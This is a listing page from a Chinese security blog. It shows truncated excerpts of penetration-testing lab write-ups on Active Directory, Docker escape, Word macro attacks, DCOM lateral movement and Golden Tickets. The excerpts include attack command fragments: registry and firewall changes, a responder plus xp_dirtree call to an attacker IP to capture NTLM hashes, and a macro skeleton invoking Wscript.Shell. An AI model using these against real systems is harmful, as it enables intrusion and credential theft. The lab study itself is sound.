AD域渗透共39篇 第2页
红日靶场4.1 Tomcat 8.5.19漏洞与docker逃逸-白鸢的笔记

红日靶场4.1 Tomcat 8.5.19漏洞与docker逃逸

环境说明机器密码ubuntu:ubuntu域成员机器douser:Dotest123DC:administrator:Test2008 ubuntu为入口机器在该机器上执行ubuntu@ubuntu:~$ sudo docker start ec814f6ee002 ec814f6ee002 ubuntu@...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
02810
红日靶场1.2 横向突破DC-白鸢的笔记

红日靶场1.2 横向突破DC

前期准备发现我是administrator上传mimikatz.exe 允许RDPreg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v 'fDenyTSConnections' /t REG_DWORD /d 0 /f 关闭防火墙netsh ...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
03710
红日靶场2-白鸢的笔记

红日靶场2

实验环境内网网段:10.10.10.1/24DMZ网段:192.168.111.1/24配置信息DCOS:Windows 2012(64)IP:10.10.10.10应用:AD域WEBOS:Windows 2008(64)IP1:10.10.10.80IP2:192.168.111.80PCOS:Windo...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
0517
红日靶场1.1 mysql拿到reverseshell-白鸢的笔记

红日靶场1.1 mysql拿到reverseshell

实验环境1. 信息收集由于我当时没注意到是win7是入口机器 所以先扫描windows server 2003nmap -T5 -A -p- -n -vvv -noscript 192.168.52.141先从ftp开始发现可以匿名登录 但是里面是空的简单爆...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
04214
Medtech 堡垒机 seimpersonateprivilege 提权-白鸢的笔记

Medtech 堡垒机 seimpersonateprivilege 提权

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0718
客户端攻击1 word宏攻击-白鸢的笔记

客户端攻击1 word宏攻击

1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
05313
Shadow Copies-白鸢的笔记

Shadow Copies

shadow copy 也被称作 Volume Shadow Service (VSS)是一种 Microsoft 备份技术,允许创建文件或整个卷的快照。为了管理卷影副本,Microsoft 签名的二进制文件 vshadow.exe作为Windows SDK 的...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0767
Active Directory 中的横向移动5 DCOM-白鸢的笔记

Active Directory 中的横向移动5 DCOM

我们将检查一种相当新的横向移动技术,该技术利用分布式组件对象模型 (DCOM)Microsoft 组件对象模型 (COM)是一个用于创建相互交互的软件组件的系统。虽然 COM 是为同进程或跨进程交互而创建的,...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0665
Backdoor  利用目录遍历寻找进程-白鸢的笔记

Backdoor 利用目录遍历寻找进程

简介BackdoorDifficulty Easy 实验环境攻击者 Kali 10.10.16.7受害者 IP 10.10.11.125  Linux 1. 信息收集收集受害者服务详情22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linu...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0498
Active Directory Persistence1 Golden Ticket-白鸢的笔记

Active Directory Persistence1 Golden Ticket

当用户提交 TGT 请求时,KDC 使用只有域中的KDC 知道的密钥对 TGT 进行加密。该密钥实际上是名为 krbtgt 的域用户帐户的密码哈希。如果我们能够获得 krbtgt 密码哈希,我们就可以创建自己的自定...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
08713